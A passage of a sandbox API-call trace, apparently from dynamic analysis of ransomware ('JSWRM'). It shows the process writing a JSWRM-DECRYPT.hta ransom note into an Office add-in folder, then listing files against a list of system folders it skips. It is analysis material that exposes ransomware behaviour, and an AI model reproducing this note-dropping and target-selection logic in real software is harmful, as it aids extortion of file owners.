(HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.026] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\cs\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\cs\\jswrm-decrypt.hta")) returned 0xffffffff [0123.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0123.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0123.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0123.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0123.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\cs\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\cs\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.031] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.031] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.032] CloseHandle (hObject=0x338) returned 1 [0123.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0123.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0123.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0123.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0123.033] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\cs\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\cs\\jswrm-decrypt.hta")) returned 0x20 [0123.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.033] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\cs\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf134fca5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ee20e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3ffd0ca2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0123.033] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.033] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf134fca5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ee20e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3ffd0ca2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.033] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.033] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.033] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ffd0ca2, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3ffd0ca2, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3fff7248, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.033] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.033] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.033] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.033] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.033] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.033] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.033] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.033] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.033] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.033] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0123.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0123.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0123.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0123.034] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2ee20e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2ee20e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2f5480d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.034] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.034] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.034] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.034] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.034] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.034] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.034] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.034] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.034] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.034] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0123.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0123.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0123.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0123.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0123.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.035] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf134fca5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf134fca5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf145ad52, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x26aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.035] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.035] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.035] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.035] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.035] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.035] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.035] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.035] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.035] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.035] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0123.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0123.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0123.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0123.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x23aa80 [0123.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0123.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.035] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb654e78, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb654e78, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb67b102, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x32aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.035] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.035] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.035] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.035] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.036] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.036] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.036] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.036] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.036] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.036] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0123.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0123.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0123.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0123.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.036] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1887f3e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1887f3e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ae17b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.036] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.036] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.036] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.036] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.036] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.036] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.036] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.036] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.036] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.036] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0123.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0123.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0123.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0123.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ef08 [0123.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0123.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.037] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1887f3e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1887f3e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ae17b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0123.037] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0123.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: 